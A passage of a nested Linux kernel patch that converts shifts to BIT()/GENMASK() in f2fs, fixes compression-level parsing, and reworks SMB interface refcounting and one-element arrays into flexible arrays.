+-		flag |= (0x1 << type);
++		flag |= BIT(type);
+ 	else
+-		flag &= ~(0x1 << type);
++		flag &= ~BIT(type);
+ 	rn->footer.flag = cpu_to_le32(flag);
+ 
+ #ifdef CONFIG_F2FS_CHECK_FS
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 1ba85ef97cbd3..3805162dcef2b 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -613,14 +613,12 @@ static int f2fs_set_lz4hc_level(struct f2fs_sb_info *sbi, const char *str)
+ {
+ #ifdef CONFIG_F2FS_FS_LZ4HC
+ 	unsigned int level;
+-#endif
+ 
+ 	if (strlen(str) == 3) {
+ 		F2FS_OPTION(sbi).compress_level = 0;
+ 		return 0;
+ 	}
+ 
+-#ifdef CONFIG_F2FS_FS_LZ4HC
+ 	str += 3;
+ 
+ 	if (str[0] != ':') {
+@@ -638,6 +636,10 @@ static int f2fs_set_lz4hc_level(struct f2fs_sb_info *sbi, const char *str)
+ 	F2FS_OPTION(sbi).compress_level = level;
+ 	return 0;
+ #else
++	if (strlen(str) == 3) {
++		F2FS_OPTION(sbi).compress_level = 0;
++		return 0;
++	}
+ 	f2fs_info(sbi, "kernel doesn't support lz4hc compression");
+ 	return -EINVAL;
+ #endif
+@@ -651,7 +653,7 @@ static int f2fs_set_zstd_level(struct f2fs_sb_info *sbi, const char *str)
+ 	int len = 4;
+ 
+ 	if (strlen(str) == len) {
+-		F2FS_OPTION(sbi).compress_level = 0;
++		F2FS_OPTION(sbi).compress_level = F2FS_ZSTD_DEFAULT_CLEVEL;
+ 		return 0;
+ 	}
+ 
+@@ -664,7 +666,7 @@ static int f2fs_set_zstd_level(struct f2fs_sb_info *sbi, const char *str)
+ 	if (kstrtouint(str + 1, 10, &level))
+ 		return -EINVAL;
+ 
+-	if (!level || level > zstd_max_clevel()) {
++	if (level < zstd_min_clevel() || level > zstd_max_clevel()) {
+ 		f2fs_info(sbi, "invalid zstd compress level: %d", level);
+ 		return -EINVAL;
+ 	}
+@@ -898,8 +900,8 @@ static int parse_options(struct super_block *sb, char *options, bool is_remount)
+ 			if (args->from && match_int(args, &arg))
+ 				return -EINVAL;
+ 			if (arg <= 0 || arg > __ilog2_u32(BIO_MAX_VECS)) {
+-				f2fs_warn(sbi, "Not support %d, larger than %d",
+-					  1 << arg, BIO_MAX_VECS);
++				f2fs_warn(sbi, "Not support %ld, larger than %d",
++					BIT(arg), BIO_MAX_VECS);
+ 				return -EINVAL;
+ 			}
+ 			F2FS_OPTION(sbi).write_io_size_bits = arg;
+@@ -1340,7 +1342,7 @@ default_check:
+ #endif
+ 
+ 	if (F2FS_IO_SIZE_BITS(sbi) && !f2fs_lfs_mode(sbi)) {
+-		f2fs_err(sbi, "Should set mode=lfs with %uKB-sized IO",
++		f2fs_err(sbi, "Should set mode=lfs with %luKB-sized IO",
+ 			 F2FS_IO_SIZE_KB(sbi));
+ 		return -EINVAL;
+ 	}
+@@ -3356,7 +3358,7 @@ static int sanity_check_raw_super(struct f2fs_sb_info *sbi,
+ 	total_sections = le32_to_cpu(raw_super->section_count);
+ 
+ 	/* blocks_per_seg should be 512, given the above check */
+-	blocks_per_seg = 1 << le32_to_cpu(raw_super->log_blocks_per_seg);
++	blocks_per_seg = BIT(le32_to_cpu(raw_super->log_blocks_per_seg));
+ 
+ 	if (segment_count > F2FS_MAX_SEGMENT ||
+ 				segment_count < F2FS_MIN_SEGMENTS) {
+@@ -3625,9 +3627,9 @@ static void init_sb_info(struct f2fs_sb_info *sbi)
+ 	sbi->log_sectors_per_block =
+ 		le32_to_cpu(raw_super->log_sectors_per_block);
+ 	sbi->log_blocksize = le32_to_cpu(raw_super->log_blocksize);
+-	sbi->blocksize = 1 << sbi->log_blocksize;
++	sbi->blocksize = BIT(sbi->log_blocksize);
+ 	sbi->log_blocks_per_seg = le32_to_cpu(raw_super->log_blocks_per_seg);
+-	sbi->blocks_per_seg = 1 << sbi->log_blocks_per_seg;
++	sbi->blocks_per_seg = BIT(sbi->log_blocks_per_seg);
+ 	sbi->segs_per_sec = le32_to_cpu(raw_super->segs_per_sec);
+ 	sbi->secs_per_zone = le32_to_cpu(raw_super->secs_per_zone);
+ 	sbi->total_sections = le32_to_cpu(raw_super->section_count);
+@@ -3883,7 +3885,7 @@ void f2fs_handle_stop(struct f2fs_sb_info *sbi, unsigned char reason)
+ 
+ 	f2fs_down_write(&sbi->sb_lock);
+ 
+-	if (raw_super->s_stop_reason[reason] < ((1 << BITS_PER_BYTE) - 1))
++	if (raw_super->s_stop_reason[reason] < GENMASK(BITS_PER_BYTE - 1, 0))
+ 		raw_super->s_stop_reason[reason]++;
+ 
+ 	err = f2fs_commit_super(sbi, false);
+@@ -4033,7 +4035,7 @@ static int f2fs_scan_devices(struct f2fs_sb_info *sbi)
+ 			  FDEV(i).start_blk, FDEV(i).end_blk);
+ 	}
+ 	f2fs_info(sbi,
+-		  "IO Block Size: %8d KB", F2FS_IO_SIZE_KB(sbi));
++		  "IO Block Size: %8ld KB", F2FS_IO_SIZE_KB(sbi));
+ 	return 0;
+ }
+ 
+diff --git a/fs/f2fs/sysfs.c b/fs/f2fs/sysfs.c
+index 3d68bfa75cf2a..751a108e612ff 100644
+--- a/fs/f2fs/sysfs.c
++++ b/fs/f2fs/sysfs.c
+@@ -451,7 +451,7 @@ out:
+ 	if (ret < 0)
+ 		return ret;
+ #ifdef CONFIG_F2FS_FAULT_INJECTION
+-	if (a->struct_type == FAULT_INFO_TYPE && t >= (1 << FAULT_MAX))
++	if (a->struct_type == FAULT_INFO_TYPE && t >= BIT(FAULT_MAX))
+ 		return -EINVAL;
+ 	if (a->struct_type == FAULT_INFO_RATE && t >= UINT_MAX)
+ 		return -EINVAL;
+diff --git a/fs/inode.c b/fs/inode.c
+index 73ad1b0d47758..8cfda7a6d5900 100644
+--- a/fs/inode.c
++++ b/fs/inode.c
+@@ -215,6 +215,8 @@ int inode_init_always(struct super_block *sb, struct inode *inode)
+ 	lockdep_set_class_and_name(&mapping->invalidate_lock,
+ 				   &sb->s_type->invalidate_lock_key,
+ 				   "mapping.invalidate_lock");
++	if (sb->s_iflags & SB_I_STABLE_WRITES)
++		mapping_set_stable_writes(mapping);
+ 	inode->i_private = NULL;
+ 	inode->i_mapping = mapping;
+ 	INIT_HLIST_HEAD(&inode->i_dentry);	/* buggered by rcu freeing */
+diff --git a/fs/nfs/fscache.c b/fs/nfs/fscache.c
+index e731c00a9fcbc..d3c938dd2b12a 100644
+--- a/fs/nfs/fscache.c
++++ b/fs/nfs/fscache.c
+@@ -176,6 +176,9 @@ void nfs_fscache_init_inode(struct inode *inode)
+ 					       &auxdata,      /* aux_data */
+ 					       sizeof(auxdata),
+ 					       i_size_read(inode));
++
++	if (netfs_inode(inode)->cache)
++		mapping_set_release_always(inode->i_mapping);
+ }
+ 
+ /*
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 512ac9dea9787..7f1aea4c11b9c 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -972,7 +972,6 @@ release_iface(struct kref *ref)
+ 	struct cifs_server_iface *iface = container_of(ref,
+ 						       struct cifs_server_iface,
+ 						       refcount);
+-	list_del_init(&iface->iface_head);
+ 	kfree(iface);
+ }
+ 
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index f725a119ce312..49fdc6dfdcf8d 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -258,10 +258,13 @@ cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry_safe(ses, nses, &pserver->smb_ses_list, smb_ses_list) {
+ 		/* check if iface is still active */
+-		if (!cifs_chan_is_iface_active(ses, server))
++		spin_lock(&ses->chan_lock);
++		if (!cifs_chan_is_iface_active(ses, server)) {
++			spin_unlock(&ses->chan_lock);
+ 			cifs_chan_update_iface(ses, server);
++			spin_lock(&ses->chan_lock);
++		}
+ 
+-		spin_lock(&ses->chan_lock);
+ 		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server)) {
+ 			spin_unlock(&ses->chan_lock);
+ 			continue;
+diff --git a/fs/smb/client/fscache.c b/fs/smb/client/fscache.c
+index e73625b5d0cc6..f64bad513ba6d 100644
+--- a/fs/smb/client/fscache.c
++++ b/fs/smb/client/fscache.c
+@@ -108,6 +108,8 @@ void cifs_fscache_get_inode_cookie(struct inode *inode)
+ 				       &cifsi->uniqueid, sizeof(cifsi->uniqueid),
+ 				       &cd, sizeof(cd),
+ 				       i_size_read(&cifsi->netfs.inode));
++	if (cifsi->netfs.cache)
++		mapping_set_release_always(inode->i_mapping);
+ }
+ 
+ void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update)
+diff --git a/fs/smb/client/inode.c b/fs/smb/client/inode.c
+index 7be51f9d2fa18..5343898bac8a6 100644
+--- a/fs/smb/client/inode.c
++++ b/fs/smb/client/inode.c
+@@ -264,7 +264,7 @@ cifs_unix_basic_to_fattr(struct cifs_fattr *fattr, FILE_UNIX_BASIC_INFO *info,
+ 		fattr->cf_dtype = DT_REG;
+ 		break;
+ 	case UNIX_SYMLINK:
+-		fattr->cf_mode |= S_IFLNK;
++		fattr->cf_mode |= S_IFLNK | cifs_sb->ctx->file_mode;
+ 		fattr->cf_dtype = DT_LNK;
+ 		break;
+ 	case UNIX_DIR:
+diff --git a/fs/smb/client/smb2file.c b/fs/smb/client/smb2file.c
+index ba6cc50af390f..a7475bc05cac0 100644
+--- a/fs/smb/client/smb2file.c
++++ b/fs/smb/client/smb2file.c
+@@ -34,7 +34,7 @@ static struct smb2_symlink_err_rsp *symlink_data(const struct kvec *iov)
+ 		len = (u32)err->ErrorContextCount * (offsetof(struct smb2_error_context_rsp,
+ 							      ErrorContextData) +
+ 						     sizeof(struct smb2_symlink_err_rsp));
+-		if (le32_to_cpu(err->ByteCount) < len || iov->iov_len < len + sizeof(*err))
++		if (le32_to_cpu(err->ByteCount) < len || iov->iov_len < len + sizeof(*err) + 1)
+ 			return ERR_PTR(-EINVAL);
+ 
+ 		p = (struct smb2_error_context_rsp *)err->ErrorData;
+diff --git a/fs/smb/client/smb2misc.c b/fs/smb/client/smb2misc.c
+index 88942b1fb4318..fdf7a7f188c5f 100644
+--- a/fs/smb/client/smb2misc.c
++++ b/fs/smb/client/smb2misc.c
+@@ -113,7 +113,7 @@ static __u32 get_neg_ctxt_len(struct smb2_hdr *hdr, __u32 len,
+ 	} else if (nc_offset + 1 == non_ctxlen) {
+ 		cifs_dbg(FYI, "no SPNEGO security blob in negprot rsp\n");
+ 		size_of_pad_before_neg_ctxts = 0;
+-	} else if (non_ctxlen == SMB311_NEGPROT_BASE_SIZE)
++	} else if (non_ctxlen == SMB311_NEGPROT_BASE_SIZE + 1)
+ 		/* has padding, but no SPNEGO blob */
+ 		size_of_pad_before_neg_ctxts = nc_offset - non_ctxlen + 1;
+ 	else
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index df03d80ab6d5f..4596d2dfdec3a 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -588,16 +588,12 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 	}
+ 
+ 	/*
+-	 * Go through iface_list and do kref_put to remove
+-	 * any unused ifaces. ifaces in use will be removed
+-	 * when the last user calls a kref_put on it
++	 * Go through iface_list and mark them as inactive
+ 	 */
+ 	list_for_each_entry_safe(iface, niface, &ses->iface_list,
+-				 iface_head) {
++				 iface_head)
+ 		iface->is_active = 0;
+-		kref_put(&iface->refcount, release_iface);
+-		ses->iface_count--;
+-	}
++
+ 	spin_unlock(&ses->iface_lock);
+ 
+ 	/*
+@@ -672,10 +668,7 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 					 iface_head) {
+ 			ret = iface_cmp(iface, &tmp_iface);
+ 			if (!ret) {
+-				/* just get a ref so that it doesn't get picked/freed */
+ 				iface->is_active = 1;
+-				kref_get(&iface->refcount);
+-				ses->iface_count++;
+ 				spin_unlock(&ses->iface_lock);
+ 				goto next_iface;
+ 			} else if (ret < 0) {
+@@ -742,6 +735,20 @@ next_iface:
+ 	}
+ 
+ out:
++	/*
++	 * Go through the list again and put the inactive entries
++	 */
++	spin_lock(&ses->iface_lock);
++	list_for_each_entry_safe(iface, niface, &ses->iface_list,
++				 iface_head) {
++		if (!iface->is_active) {
++			list_del(&iface->iface_head);
++			kref_put(&iface->refcount, release_iface);
++			ses->iface_count--;
++		}
++	}
++	spin_unlock(&ses->iface_lock);
++
+ 	return rc;
+ }
+ 
+@@ -778,9 +785,14 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 		goto out;
+ 
+ 	/* check if iface is still active */
++	spin_lock(&ses->chan_lock);
+ 	pserver = ses->chans[0].server;
+-	if (pserver && !cifs_chan_is_iface_active(ses, pserver))
++	if (pserver && !cifs_chan_is_iface_active(ses, pserver)) {
++		spin_unlock(&ses->chan_lock);
+ 		cifs_chan_update_iface(ses, pserver);
++		spin_lock(&ses->chan_lock);
++	}
++	spin_unlock(&ses->chan_lock);
+ 
+ out:
+ 	kfree(out_buf);
+@@ -5752,7 +5764,7 @@ struct smb_version_values smb20_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -5774,7 +5786,7 @@ struct smb_version_values smb21_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -5795,7 +5807,7 @@ struct smb_version_values smb3any_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -5816,7 +5828,7 @@ struct smb_version_values smbdefault_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -5837,7 +5849,7 @@ struct smb_version_values smb30_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -5858,7 +5870,7 @@ struct smb_version_values smb302_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -5879,7 +5891,7 @@ struct smb_version_values smb311_values = {
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.header_preamble_size = 0,
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index 05ff8a457a3d7..2dfbf1b23cfa0 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -1386,7 +1386,7 @@ SMB2_sess_sendreceive(struct SMB2_sess_data *sess_data)
+ 
+ 	/* Testing shows that buffer offset must be at location of Buffer[0] */
+ 	req->SecurityBufferOffset =
+-		cpu_to_le16(sizeof(struct smb2_sess_setup_req) - 1 /* pad */);
++		cpu_to_le16(sizeof(struct smb2_sess_setup_req));
+ 	req->SecurityBufferLength = cpu_to_le16(sess_data->iov[1].iov_len);
+ 
+ 	memset(&rqst, 0, sizeof(struct smb_rqst));
+@@ -1905,8 +1905,7 @@ SMB2_tcon(const unsigned int xid, struct cifs_ses *ses, const char *tree,
+ 	iov[0].iov_len = total_len - 1;
+ 
+ 	/* Testing shows that buffer offset must be at location of Buffer[0] */
+-	req->PathOffset = cpu_to_le16(sizeof(struct smb2_tree_connect_req)
+-			- 1 /* pad */);
++	req->PathOffset = cpu_to_le16(sizeof(struct smb2_tree_connect_req));
+ 	req->PathLength = cpu_to_le16(unc_path_len - 2);
+ 	iov[1].iov_base = unc_path;
+ 	iov[1].iov_len = unc_path_len;
+@@ -3796,7 +3795,7 @@ SMB2_change_notify(const unsigned int xid, struct cifs_tcon *tcon,
+ 			ses->Suid, (u8)watch_tree, completion_filter);
+ 		/* validate that notify information is plausible */
+ 		if ((rsp_iov.iov_base == NULL) ||
+-		    (rsp_iov.iov_len < sizeof(struct smb2_change_notify_rsp)))
++		    (rsp_iov.iov_len < sizeof(struct smb2_change_notify_rsp) + 1))
+ 			goto cnotify_exit;
+ 
+ 		smb_rsp = (struct smb2_change_notify_rsp *)rsp_iov.iov_base;
+@@ -5009,7 +5008,7 @@ int SMB2_query_directory_init(const unsigned int xid,
+ 	memcpy(bufptr, &asteriks, len);
+ 
+ 	req->FileNameOffset =
+-		cpu_to_le16(sizeof(struct smb2_query_directory_req) - 1);
++		cpu_to_le16(sizeof(struct smb2_query_directory_req));
+ 	req->FileNameLength = cpu_to_le16(len);
+ 	/*
+ 	 * BB could be 30 bytes or so longer if we used SMB2 specific
+@@ -5205,8 +5204,7 @@ SMB2_set_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+ 	req->VolatileFileId = volatile_fid;
+ 	req->AdditionalInformation = cpu_to_le32(additional_info);
+ 
+-	req->BufferOffset =
+-			cpu_to_le16(sizeof(struct smb2_set_info_req) - 1);
++	req->BufferOffset = cpu_to_le16(sizeof(struct smb2_set_info_req));
+ 	req->BufferLength = cpu_to_le32(*size);
+ 
+ 	memcpy(req->Buffer, *data, *size);
+@@ -5440,9 +5438,9 @@ build_qfs_info_req(struct kvec *iov, struct cifs_tcon *tcon,
+ 	req->VolatileFileId = volatile_fid;
+ 	/* 1 for pad */
+ 	req->InputBufferOffset =
+-			cpu_to_le16(sizeof(struct smb2_query_info_req) - 1);
++			cpu_to_le16(sizeof(struct smb2_query_info_req));
+ 	req->OutputBufferLength = cpu_to_le32(
+-		outbuf_len + sizeof(struct smb2_query_info_rsp) - 1);
++		outbuf_len + sizeof(struct smb2_query_info_rsp));
+ 
+ 	iov->iov_base = (char *)req;
+ 	iov->iov_len = total_len;
+diff --git a/fs/smb/client/smb2pdu.h b/fs/smb/client/smb2pdu.h
+index 1237bb86e93a8..a5773a06aba8e 100644
+--- a/fs/smb/client/smb2pdu.h
++++ b/fs/smb/client/smb2pdu.h
+@@ -57,7 +57,7 @@ struct smb2_rdma_crypto_transform {
+ #define COMPOUND_FID 0xFFFFFFFFFFFFFFFFULL
+ 
+ #define SMB2_SYMLINK_STRUCT_SIZE \
+-	(sizeof(struct smb2_err_rsp) - 1 + sizeof(struct smb2_symlink_err_rsp))
++	(sizeof(struct smb2_err_rsp) + sizeof(struct smb2_symlink_err_rsp))
+ 
+ #define SYMLINK_ERROR_TAG 0x4c4d5953
+ 
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index 07549957b3099..5593bb49954c6 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -189,7 +189,7 @@ struct smb2_err_rsp {
+ 	__u8   ErrorContextCount;
+ 	__u8   Reserved;
+ 	__le32 ByteCount;  /* even if zero, at least one byte follows */
+-	__u8   ErrorData[1];  /* variable length */
++	__u8   ErrorData[];  /* variable length */
+ } __packed;
+ 
+ #define SMB3_AES_CCM_NONCE 11
+@@ -330,7 +330,7 @@ struct smb2_tree_connect_req {
+ 	__le16 Flags;		/* Flags in SMB3.1.1 */
+ 	__le16 PathOffset;
+ 	__le16 PathLength;
+-	__u8   Buffer[1];	/* variable length */
++	__u8   Buffer[];	/* variable length */
+ } __packed;
+ 
+ /* Possible ShareType values */
+@@ -617,7 +617,7 @@ struct smb2_negotiate_rsp {
+ 	__le16 SecurityBufferOffset;
+ 	__le16 SecurityBufferLength;
+ 	__le32 NegotiateContextOffset;	/* Pre:SMB3.1.1 was reserved/ignored */
+-	__u8   Buffer[1];	/* variable length GSS security buffer */
++	__u8   Buffer[];	/* variable length GSS security buffer */
+ } __packed;
+ 
+ 
+@@ -638,7 +638,7 @@ struct smb2_sess_setup_req {
+ 	__le16 SecurityBufferOffset;
+ 	__le16 SecurityBufferLength;
+ 	__le64 PreviousSessionId;
+-	__u8   Buffer[1];	/* variable length GSS security buffer */
++	__u8   Buffer[];	/* variable length GSS security buffer */
+ } __packed;
+ 
+ /* Currently defined SessionFlags */
+@@ -655,7 +655,7 @@ struct smb2_sess_setup_rsp {
+ 	__le16 SessionFlags;
+ 	__le16 SecurityBufferOffset;
+ 	__le16 SecurityBufferLength;
+-	__u8   Buffer[1];	/* variable length GSS security buffer */
++	__u8   Buffer[];	/* variable length GSS security buffer */
+ } __packed;
+ 
+ 
+@@ -737,7 +737,7 @@ struct smb2_read_req {
+ 	__le32 RemainingBytes;
+ 	__le16 ReadChannelInfoOffset;
+ 	__le16 ReadChannelInfoLength;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ /* Read flags */
+@@ -752,7 +752,7 @@ struct smb2_read_rsp {
+ 	__le32 DataLength;
+ 	__le32 DataRemaining;
+ 	__le32 Flags;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ 
+@@ -776,7 +776,7 @@ struct smb2_write_req {
+ 	__le16 WriteChannelInfoOffset;
+ 	__le16 WriteChannelInfoLength;
+ 	__le32 Flags;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ struct smb2_write_rsp {
+@@ -787,7 +787,7 @@ struct smb2_write_rsp {
+ 	__le32 DataLength;
+ 	__le32 DataRemaining;
+ 	__u32  Reserved2;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ 
+@@ -834,7 +834,10 @@ struct smb2_lock_req {
+ 	__u64  PersistentFileId;
+ 	__u64  VolatileFileId;
+ 	/* Followed by at least one */
+-	struct smb2_lock_element locks[1];
++	union {
++		struct smb2_lock_element lock;
++		DECLARE_FLEX_ARRAY(struct smb2_lock_element, locks);
++	};
+ } __packed;
+ 
+ struct smb2_lock_rsp {
+@@ -888,7 +891,7 @@ struct smb2_query_directory_req {
+ 	__le16 FileNameOffset;
+ 	__le16 FileNameLength;
+ 	__le32 OutputBufferLength;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ struct smb2_query_directory_rsp {
+@@ -896,7 +899,7 @@ struct smb2_query_directory_rsp {
+ 	__le16 StructureSize; /* Must be 9 */
+ 	__le16 OutputBufferOffset;
+ 	__le32 OutputBufferLength;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ /*
+@@ -919,7 +922,7 @@ struct smb2_set_info_req {
+ 	__le32 AdditionalInformation;
+ 	__u64  PersistentFileId;
+ 	__u64  VolatileFileId;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ struct smb2_set_info_rsp {
+@@ -974,7 +977,7 @@ struct smb2_change_notify_rsp {
+ 	__le16	StructureSize;  /* Must be 9 */
+ 	__le16	OutputBufferOffset;
+ 	__le32	OutputBufferLength;
+-	__u8	Buffer[1]; /* array of file notify structs */
++	__u8	Buffer[]; /* array of file notify structs */
+ } __packed;
+ 
+ 
+@@ -1180,7 +1183,7 @@ struct smb2_create_rsp {
+ 	__u64  VolatileFileId;
+ 	__le32 CreateContextsOffset;
+ 	__le32 CreateContextsLength;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ struct create_posix {
+@@ -1524,7 +1527,7 @@ struct smb2_query_info_req {
+ 	__le32 Flags;
+ 	__u64  PersistentFileId;
+ 	__u64  VolatileFileId;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ struct smb2_query_info_rsp {
+@@ -1532,7 +1535,7 @@ struct smb2_query_info_rsp {
+ 	__le16 StructureSize; /* Must be 9 */
+ 	__le16 OutputBufferOffset;
+ 	__le32 OutputBufferLength;
+-	__u8   Buffer[1];
++	__u8   Buffer[];
+ } __packed;
+ 
+ /*
+@@ -1593,7 +1596,10 @@ struct smb2_file_all_info { /* data block encoding of response to level 18 */
+ 	__le32 Mode;
+ 	__le32 AlignmentRequirement;
+ 	__le32 FileNameLength;
+-	char   FileName[1];
++	union {
++		char __pad;	/* Legacy structure padding */
++		DECLARE_FLEX_ARRAY(char, FileName);
++	};
+ } __packed; /* level 18 Query */
+ 
+ struct smb2_file_eof_info { /* encoding of request for level 10 */
+diff --git a/fs/smb/server/smb2ops.c b/fs/smb/server/smb2ops.c
+index 535402629655e..27a9dce3e03ab 100644
+--- a/fs/smb/server/smb2ops.c
++++ b/fs/smb/server/smb2ops.c
+@@ -26,7 +26,7 @@ static struct smb_version_values smb21_server_values = {
+ 	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -52,7 +52,7 @@ static struct smb_version_values smb30_server_values = {
+ 	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -79,7 +79,7 @@ static struct smb_version_values smb302_server_values = {
+ 	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+@@ -106,7 +106,7 @@ static struct smb_version_values smb311_server_values = {
+ 	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+ 	.header_size = sizeof(struct smb2_hdr),
+ 	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.read_rsp_size = sizeof(struct smb2_read_rsp),
+ 	.lock_cmd = SMB2_LOCK,
+ 	.cap_unix = 0,
+ 	.cap_nt_find = SMB2_NT_FIND,
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index ea48dd06d4da3..6e5ed0ac578a6 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -294,8 +294,7 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 	if (server_conf.signing == KSMBD_CONFIG_OPT_MANDATORY)
+ 		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
+ 	err = ksmbd_iov_pin_rsp(work, rsp,
+-				sizeof(struct smb2_negotiate_rsp) -
+-				sizeof(rsp->Buffer) + AUTH_GSS_LENGTH);
++				sizeof(struct smb2_negotiate_rsp) + AUTH_GSS_LENGTH);
+ 	if (err)
+ 		return err;
+ 	conn->use_spnego = true;
+@@ -1263,9 +1262,8 @@ err_out:
+ 
+ 	if (!rc)
+ 		rc = ksmbd_iov_pin_rsp(work, rsp,
+-				       sizeof(struct smb2_negotiate_rsp) -
+-					sizeof(rsp->Buffer) +
+-					AUTH_GSS_LENGTH + neg_ctxt_len);
++				       sizeof(struct smb2_negotiate_rsp) +
++				       AUTH_GSS_LENGTH + neg_ctxt_len);
+ 	if (rc < 0)
